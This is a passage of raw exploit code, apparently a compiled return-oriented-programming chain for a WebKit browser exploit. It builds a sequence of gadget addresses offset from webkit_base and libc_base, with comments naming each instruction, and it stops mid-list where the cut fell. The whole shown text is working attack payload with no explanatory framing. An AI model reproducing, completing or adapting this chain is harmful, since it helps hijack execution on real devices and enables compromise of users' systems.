set_gadget(webkit_base+3236123,); //pop r9 //L5678: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5679: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+293880, //L5682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+293848, //L5680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5680: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5681: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5682: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+293984, //L5683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5683: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5685: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+294104, //L5688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294088, //L5686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5686: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5688: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+294248, //L5691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+294216, //L5689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+294232, //L5690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5689: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5690: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+294344, //L5693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5692: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L5693: db([0, 0]); // 0x0 set_gadgets([ libc_base